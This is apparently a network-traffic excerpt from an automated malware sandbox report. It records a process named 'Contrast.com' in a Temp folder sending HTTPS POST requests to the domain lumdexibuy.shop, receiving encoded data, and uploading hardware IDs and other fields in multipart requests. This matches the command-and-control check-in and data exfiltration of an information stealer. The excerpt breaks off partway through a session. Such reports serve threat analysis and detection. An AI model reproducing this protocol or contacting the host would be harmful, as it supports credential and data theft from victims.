                                                                                                                                      2024-11-29 14:12:39 UTC1014INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:39 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=e0ms5u9kkhq046me15lbc4jfk3; expires=Tue, 25-Mar-2025 07:59:16 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzlfBWVXUs%2Ff7EjA7m5pxl6%2FPkTTAB2g3De5eN2SUa9G6ifDMcpWCIFMD89wR3VUrZTda9yeEADPYro%2BlniHJWl94fzA6NZHaNenxT8f8LqPc7wxE%2B9FGdf2NcsaTK5u9lM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331955fff15d7-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1683&rtt_var=645&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1679125&cwnd=225&unsent_bytes=0&cid=8aeb544195818665&ts=2547&x=0"
                                                                                                                                      2024-11-29 14:12:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 14:12:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.549764104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:40 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 79
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:40 UTC79OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--KASTA&j=7567fff5468f5b682780aea4c2eb6266
                                                                                                                                      2024-11-29 14:12:43 UTC1024INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=2qfqk2l8qpcc16pop7ok5flgg6; expires=Tue, 25-Mar-2025 07:59:20 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxXs1JtLGtasCRET9l8Va%2FsW%2B%2F7Typbqx3qts6j5dTIYu33QzjYuuBDkRrQljKePuyWf5SPn68edE1%2FMOFGxqhR9IV%2Fi%2B8KoX0%2FiYAIbbdwkVjgH%2FM%2FRybH2ITJcopmCmFk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331adb8863338-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1819&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=978&delivery_rate=1530398&cwnd=245&unsent_bytes=0&cid=fb5c3d09b20e5e47&ts=2954&x=0"
                                                                                                                                      2024-11-29 14:12:43 UTC345INData Raw: 63 63 35 0d 0a 37 43 61 6f 4d 41 4e 79 63 37 42 78 55 4f 7a 77 4f 2f 43 6b 39 41 2b 52 54 78 31 78 2b 4a 5a 62 32 6e 61 61 4f 4b 44 57 33 43 36 58 42 4e 34 53 4f 55 5a 66 6b 67 49 31 7a 73 70 64 6b 63 69 48 61 72 31 74 66 42 58 61 72 44 32 37 47 75 6c 64 6a 50 53 35 56 73 34 63 38 30 73 68 46 78 32 53 53 33 4b 4a 6d 6c 6d 52 79 4a 5a 75 2b 69 42 74 48 5a 76 2b 4e 37 30 65 2f 31 76 45 74 37 42 44 69 55 50 4e 55 57 6b 63 47 74 30 5a 50 63 37 63 47 5a 58 65 31 6a 57 7a 41 6e 67 46 6d 64 73 36 71 52 32 34 52 59 79 74 2f 6b 75 43 42 4a 49 53 59 68 63 52 33 42 63 30 68 35 68 54 6d 4d 43 58 61 2f 73 2f 64 42 65 51 2f 6a 6d 2b 48 2f 56 53 30 4c 71 36 52 49 4a 46 78 31 45 68 58 6c 48 56 43 33 4c 57 30 67 71 67 78 59 64 38 35 69 42 76 46 64 72 72 64 36 46 55 2f 31
                                                                                                                                      Data Ascii: cc57CaoMANyc7BxUOzwO/Ck9A+RTx1x+JZb2naaOKDW3C6XBN4SOUZfkgI1zspdkciHar1tfBXarD27GuldjPS5Vs4c80shFx2SS3KJmlmRyJZu+iBtHZv+N70e/1vEt7BDiUPNUWkcGt0ZPc7cGZXe1jWzAngFmds6qR24RYyt/kuCBJISYhcR3Bc0h5hTmMCXa/s/dBeQ/jm+H/VS0Lq6RIJFx1EhXlHVC3LW0gqgxYd85iBvFdrrd6FU/1
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 52 34 56 42 32 46 6c 6f 48 52 7a 53 48 6a 69 42 6b 56 6d 56 7a 4a 78 69 2b 53 6c 79 48 70 7a 30 4f 66 68 61 75 46 33 61 39 4f 59 4d 72 55 48 61 56 57 30 47 55 2b 68 54 4c 63 43 4c 47 5a 58 4b 31 6a 57 7a 4a 58 6f 51 6d 66 38 32 75 78 7a 7a 53 4d 4b 6d 75 45 47 4c 56 73 78 58 62 78 6f 53 77 42 6b 38 69 4a 46 51 6d 63 2b 54 61 76 64 74 4d 56 4f 64 37 48 6e 67 56 4e 6c 58 79 62 69 30 57 34 34 45 31 52 78 34 55 42 62 65 55 32 72 4f 6c 6c 69 57 78 35 4a 6a 2f 53 6c 7a 46 5a 54 35 4e 72 34 65 2b 46 33 49 76 4c 5a 4e 67 30 2f 46 55 6d 51 64 46 64 51 66 4d 34 76 53 46 39 4c 42 6a 69 32 72 62 56 45 55 6d 65 5a 37 6a 52 66 32 56 4d 57 69 2f 6c 50 41 58 59 70 56 62 56 42 4a 6b 68 30 33 67 59 42 59 67 4d 4f 59 66 2f 38 6f 65 52 36 5a 2b 6a 6d 39 45 2f 56 55 78 4c 4f
                                                                                                                                      Data Ascii: R4VB2FloHRzSHjiBkVmVzJxi+SlyHpz0OfhauF3a9OYMrUHaVW0GU+hTLcCLGZXK1jWzJXoQmf82uxzzSMKmuEGLVsxXbxoSwBk8iJFQmc+TavdtMVOd7HngVNlXybi0W44E1Rx4UBbeU2rOlliWx5Jj/SlzFZT5Nr4e+F3IvLZNg0/FUmQdFdQfM4vSF9LBji2rbVEUmeZ7jRf2VMWi/lPAXYpVbVBJkh03gYBYgMOYf/8oeR6Z+jm9E/VUxLO
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 59 70 56 62 56 42 4a 6b 68 38 37 6a 70 6c 54 6c 73 61 52 59 50 59 75 65 42 43 58 38 7a 4f 32 45 2f 78 57 79 37 6d 34 54 49 6c 41 7a 30 42 6b 47 52 33 65 55 33 7a 4f 6c 55 48 53 6e 74 5a 43 39 44 74 38 50 4a 6e 6c 4d 50 67 4c 74 6b 4f 43 73 37 49 4d 31 67 54 4e 56 32 6b 62 46 39 6f 54 49 49 75 63 55 70 50 4d 6b 47 7a 2b 49 58 6b 54 6d 2f 51 2f 74 42 54 2f 58 64 43 6d 75 30 71 63 54 6f 6f 63 49 52 63 4a 6b 6b 74 79 75 49 4a 4f 67 39 44 55 57 50 41 6a 63 52 53 4d 74 43 62 32 44 62 68 64 7a 76 54 6d 44 49 56 45 78 6c 56 70 46 68 58 61 48 44 32 48 67 46 69 65 79 49 52 71 38 79 52 78 48 4a 62 39 4e 4c 38 5a 38 31 44 50 73 4c 6c 4e 7a 67 71 4b 56 58 6c 51 53 5a 49 6c 49 6f 4f 65 64 35 6e 4b 6e 79 33 73 59 32 5a 54 6e 66 68 35 34 46 54 38 56 73 71 2b 73 55 57 45
                                                                                                                                      Data Ascii: YpVbVBJkh87jplTlsaRYPYueBCX8zO2E/xWy7m4TIlAz0BkGR3eU3zOlUHSntZC9Dt8PJnlMPgLtkOCs7IM1gTNV2kbF9oTIIucUpPMkGz+IXkTm/Q/tBT/XdCmu0qcToocIRcJkktyuIJOg9DUWPAjcRSMtCb2DbhdzvTmDIVExlVpFhXaHD2HgFieyIRq8yRxHJb9NL8Z81DPsLlNzgqKVXlQSZIlIoOed5nKny3sY2ZTnfh54FT8Vsq+sUWE
                                                                                                                                      2024-11-29 14:12:43 UTC193INData Raw: 55 57 48 70 4a 64 63 6f 6d 4b 47 63 71 47 75 55 72 47 62 31 34 70 32 75 74 33 6f 56 54 2f 56 6f 4c 73 2f 6b 43 4e 53 4d 4a 64 5a 78 6b 64 32 42 6f 35 67 70 6c 64 6e 73 2b 54 61 2f 49 6f 65 68 4b 65 2b 44 4f 2b 46 2f 74 56 7a 62 75 32 44 4d 41 45 7a 55 6f 68 53 46 48 33 42 44 6d 41 6c 42 6d 4e 69 49 38 74 39 43 45 2f 53 39 72 34 4d 4c 34 53 2f 56 62 44 73 72 5a 4a 68 6b 44 4c 56 47 63 54 48 74 59 57 4d 34 47 57 56 5a 7a 4d 6c 32 7a 2f 4a 6e 41 59 6e 37 52 33 2b 42 50 67 47 70 72 30 6a 30 2b 59 55 39 70 65 49 51 39 66 79 31 4d 31 67 74 49 42 30 73 65 45 5a 2f 6b 6a 65 0d 0a
                                                                                                                                      Data Ascii: UWHpJdcomKGcqGuUrGb14p2ut3oVT/VoLs/kCNSMJdZxkd2Bo5gpldns+Ta/IoehKe+DO+F/tVzbu2DMAEzUohSFH3BDmAlBmNiI8t9CE/S9r4ML4S/VbDsrZJhkDLVGcTHtYWM4GWVZzMl2z/JnAYn7R3+BPgGpr0j0+YU9peIQ9fy1M1gtIB0seEZ/kje
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 33 37 36 37 0d 0a 68 79 66 39 7a 61 2f 47 66 35 57 79 4c 32 32 53 6f 46 4e 32 46 46 74 48 68 62 63 48 7a 79 44 6d 46 71 66 68 74 67 74 39 44 55 2f 53 39 72 59 50 72 55 36 38 31 62 46 39 4b 45 43 6c 77 54 4e 58 69 46 49 55 64 34 5a 50 6f 65 53 55 4a 66 4f 6e 57 54 32 4c 48 51 57 6d 66 49 30 74 78 33 71 55 4d 47 36 76 55 43 43 51 73 74 52 63 78 67 59 6b 6c 31 79 69 59 6f 5a 79 6f 61 33 59 2f 34 35 65 41 50 61 36 33 65 68 56 50 39 57 67 75 7a 2b 54 34 39 4c 79 56 4e 73 46 68 6a 61 45 7a 53 4c 6e 56 53 63 77 5a 46 74 2f 69 4e 77 46 5a 4c 35 4e 62 4d 61 38 56 7a 43 74 62 51 4d 77 41 54 4e 53 69 46 49 55 65 49 51 4d 6f 36 4a 47 59 32 49 6a 79 33 30 49 54 39 4c 32 75 59 7a 73 52 54 37 56 63 57 77 74 55 43 4c 51 63 56 52 61 42 55 59 33 41 45 37 67 4a 70 52 6e 63
                                                                                                                                      Data Ascii: 3767hyf9za/Gf5WyL22SoFN2FFtHhbcHzyDmFqfhtgt9DU/S9rYPrU681bF9KEClwTNXiFIUd4ZPoeSUJfOnWT2LHQWmfI0tx3qUMG6vUCCQstRcxgYkl1yiYoZyoa3Y/45eAPa63ehVP9Wguz+T49LyVNsFhjaEzSLnVScwZFt/iNwFZL5NbMa8VzCtbQMwATNSiFIUeIQMo6JGY2Ijy30IT9L2uYzsRT7VcWwtUCLQcVRaBUY3AE7gJpRnc
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 4c 6e 41 51 6d 66 55 7a 71 67 62 30 55 38 71 78 73 6b 65 41 51 74 68 55 62 68 6b 53 30 52 6f 31 68 70 35 54 6b 63 48 57 49 37 4d 71 5a 31 50 43 74 42 71 76 42 50 55 61 33 66 71 6e 44 49 6c 49 69 67 6f 68 47 42 7a 61 47 54 61 4a 6e 31 36 55 7a 34 52 6b 39 69 4e 2f 46 35 48 37 50 37 77 58 2b 45 6a 45 73 4c 5a 50 67 30 6e 45 55 57 56 51 58 35 49 55 4b 73 37 4b 47 61 44 4c 6d 48 62 38 4b 6d 34 5a 32 75 74 33 6f 56 54 2f 56 6f 4c 73 2f 6b 69 41 56 73 46 54 61 68 73 66 31 52 77 33 68 4a 4a 57 6c 73 57 59 5a 76 49 75 64 78 36 58 2b 6a 4f 78 48 66 39 57 78 72 50 2b 41 73 35 44 30 68 49 35 55 44 72 7a 50 68 36 4a 69 42 6d 4e 69 49 38 74 39 43 45 2f 53 39 72 34 4d 4c 51 65 38 31 33 49 75 72 64 43 68 56 62 59 55 57 55 54 47 4e 45 55 4f 34 43 53 58 70 66 49 6b 57 7a
                                                                                                                                      Data Ascii: LnAQmfUzqgb0U8qxskeAQthUbhkS0Ro1hp5TkcHWI7MqZ1PCtBqvBPUa3fqnDIlIigohGBzaGTaJn16Uz4Rk9iN/F5H7P7wX+EjEsLZPg0nEUWVQX5IUKs7KGaDLmHb8Km4Z2ut3oVT/VoLs/kiAVsFTahsf1Rw3hJJWlsWYZvIudx6X+jOxHf9WxrP+As5D0hI5UDrzPh6JiBmNiI8t9CE/S9r4MLQe813IurdChVbYUWUTGNEUO4CSXpfIkWz
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 74 72 7a 4e 66 68 4d 75 46 76 4a 76 72 46 42 6a 55 4c 4a 57 57 51 61 45 4e 55 62 50 35 79 52 56 70 33 43 6c 6d 4c 31 4b 33 34 63 6e 50 4d 77 75 52 7a 2f 47 6f 7a 30 75 56 54 4f 48 49 70 38 5a 68 4d 56 6b 67 78 38 6c 39 4a 65 6e 6f 62 4f 4c 66 4d 6e 64 52 6d 55 39 44 36 71 45 76 46 61 77 61 61 39 53 6f 5a 43 78 6c 35 73 47 42 6a 53 46 6a 6d 44 6d 56 53 55 78 70 31 73 73 32 4d 2f 46 49 4b 30 59 66 67 6c 39 56 54 47 75 72 31 63 69 51 54 56 48 48 68 51 46 74 35 54 61 73 36 64 55 49 44 42 6b 32 58 36 4c 58 45 61 6b 2f 4d 39 75 78 58 38 56 73 32 39 76 55 53 50 54 4d 56 52 59 52 73 5a 32 42 49 38 69 39 49 58 30 73 47 4f 4c 61 74 74 55 42 43 66 2f 7a 6a 36 4d 2f 35 64 7a 76 53 68 41 70 63 45 7a 56 34 68 53 46 48 52 46 7a 79 48 6e 56 32 59 77 5a 5a 71 39 53 31 33
                                                                                                                                      Data Ascii: trzNfhMuFvJvrFBjULJWWQaENUbP5yRVp3ClmL1K34cnPMwuRz/Goz0uVTOHIp8ZhMVkgx8l9JenobOLfMndRmU9D6qEvFawaa9SoZCxl5sGBjSFjmDmVSUxp1ss2M/FIK0Yfgl9VTGur1ciQTVHHhQFt5Tas6dUIDBk2X6LXEak/M9uxX8Vs29vUSPTMVRYRsZ2BI8i9IX0sGOLattUBCf/zj6M/5dzvShApcEzV4hSFHRFzyHnV2YwZZq9S13
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 6e 2f 46 2b 70 49 78 4c 65 6f 54 38 6c 36 39 46 46 33 48 52 37 5a 45 67 79 77 76 46 53 54 78 5a 67 76 77 6a 74 79 41 35 6e 78 50 6f 59 71 39 6c 33 57 73 37 42 4b 6a 67 53 45 45 6d 35 51 53 65 74 54 65 73 36 74 46 39 4c 65 31 6a 57 7a 47 48 77 64 6c 50 4d 76 71 56 6e 62 54 4d 2b 37 74 55 33 4f 43 6f 70 55 49 55 68 42 6e 46 4d 32 6e 39 49 42 77 70 54 4e 4f 4b 42 36 4c 30 47 46 75 69 44 34 41 72 67 43 6b 50 72 2b 58 73 34 63 69 68 56 76 48 52 44 52 48 54 47 63 67 46 2b 52 30 4a 55 71 7a 52 4e 65 48 70 48 34 4e 4c 63 66 78 6d 54 6a 75 62 56 41 67 30 76 42 62 46 38 46 45 74 77 64 4e 5a 69 44 47 64 79 47 6d 53 32 72 46 44 39 62 32 73 74 33 2b 41 79 34 41 6f 4b 42 76 55 4b 41 51 39 78 44 4c 44 45 63 32 52 38 2f 67 5a 6b 5a 33 49 61 51 4c 61 74 39 4d 56 4f 65 35
                                                                                                                                      Data Ascii: n/F+pIxLeoT8l69FF3HR7ZEgywvFSTxZgvwjtyA5nxPoYq9l3Ws7BKjgSEEm5QSetTes6tF9Le1jWzGHwdlPMvqVnbTM+7tU3OCopUIUhBnFM2n9IBwpTNOKB6L0GFuiD4ArgCkPr+Xs4cihVvHRDRHTGcgF+R0JUqzRNeHpH4NLcfxmTjubVAg0vBbF8FEtwdNZiDGdyGmS2rFD9b2st3+Ay4AoKBvUKAQ9xDLDEc2R8/gZkZ3IaQLat9MVOe5
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 6f 58 4d 47 4b 67 47 65 43 51 73 31 49 5a 68 59 33 38 6c 4e 38 7a 70 30 5a 79 76 2f 57 4a 62 4d 53 4d 56 4f 43 74 47 48 34 49 66 74 55 7a 4c 4f 6f 58 63 4e 68 33 56 46 78 46 68 4b 53 58 58 4b 49 30 67 48 43 69 4e 5a 70 34 6d 30 6e 51 38 69 76 62 4f 74 44 71 41 6a 64 2b 71 63 4d 6d 41 53 53 41 43 39 51 41 35 4a 4c 63 73 6d 52 53 34 44 41 6c 58 76 77 61 6b 45 74 76 50 63 6f 73 6a 58 31 53 73 57 4b 67 46 6d 4e 53 73 52 56 64 77 46 52 6e 46 4d 39 7a 73 70 67 30 6f 37 61 61 2f 41 37 50 79 7a 55 74 43 48 34 54 4c 68 76 77 62 71 77 53 35 68 56 68 33 52 69 41 52 76 7a 48 69 4b 4a 30 68 66 53 77 4e 59 31 6f 47 4d 2f 46 34 75 30 59 65 68 47 6f 77 2b 52 34 2b 34 65 6b 51 72 54 45 6e 64 51 53 59 42 64 63 70 7a 53 41 64 4b 42 6c 58 2f 68 4b 33 77 46 6d 62 4d 48 68 69
                                                                                                                                      Data Ascii: oXMGKgGeCQs1IZhY38lN8zp0Zyv/WJbMSMVOCtGH4IftUzLOoXcNh3VFxFhKSXXKI0gHCiNZp4m0nQ8ivbOtDqAjd+qcMmASSAC9QA5JLcsmRS4DAlXvwakEtvPcosjX1SsWKgFmNSsRVdwFRnFM9zspg0o7aa/A7PyzUtCH4TLhvwbqwS5hVh3RiARvzHiKJ0hfSwNY1oGM/F4u0YehGow+R4+4ekQrTEndQSYBdcpzSAdKBlX/hK3wFmbMHhi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.549775104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:45 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=PZGP4FN1MNJN
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 12799
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:45 UTC12799OUTData Raw: 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a
                                                                                                                                      Data Ascii: --PZGP4FN1MNJNContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--PZGP4FN1MNJNContent-Disposition: form-data; name="pid"2--PZGP4FN1MNJNContent-Disposition: form-data; name="lid"hRjzG3--KASTA--PZGP4FN1MNJN
                                                                                                                                      2024-11-29 14:12:48 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:48 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lmfdm13lbgt54fkp4oqot8k9ik; expires=Tue, 25-Mar-2025 07:59:25 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOarQa8KTGcPhjwJAHb%2BewoQARlcwl%2F4pj92riVMr%2B8EhMoZB0iZWsmRVYHAu6u1w4b0wQfTfPQtA1OqM53U1d%2BdGhqqNOQHu8%2BvIaVDApTqGpG38G5m3GOkjtt99rdYRvA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331c9b80e43c4-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1611&rtt_var=606&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13732&delivery_rate=1812538&cwnd=222&unsent_bytes=0&cid=289b38fa4224ca87&ts=2890&x=0"
                                                                                                                                      2024-11-29 14:12:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:12:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.549786104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:49 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=4SWC7R2U0LS2
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 15041
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:49 UTC15041OUTData Raw: 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a
                                                                                                                                      Data Ascii: --4SWC7R2U0LS2Content-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--4SWC7R2U0LS2Content-Disposition: form-data; name="pid"2--4SWC7R2U0LS2Content-Disposition: form-data; name="lid"hRjzG3--KASTA--4SWC7R2U0LS2
                                                                                                                                      2024-11-29 14:12:52 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:52 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=8afp70087ns2r0h0q0fs95vkc4; expires=Tue, 25-Mar-2025 07:59:29 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P28fq9eMmo2cR02uYtQHnVrJzyNxPomULUrgzxWh4nsoStN0zduVqqL%2FXUjXXNKy9dsRYibvIukKKMgTyszpYFiWtg%2BN%2Bvuq6%2B6Zv1xRU2xVAcFSOplxCpmxJs%2FXhvYFQPU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331e46ee943e2-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=611&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15974&delivery_rate=1770770&cwnd=212&unsent_bytes=0&cid=d30e1f2e31928db6&ts=2900&x=0"
                                                                                                                                      2024-11-29 14:12:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:12:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.549797104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:54 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=082MXLHK4KN3N
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20537
                                                                                                                                      Host: lumdexibuy.shop
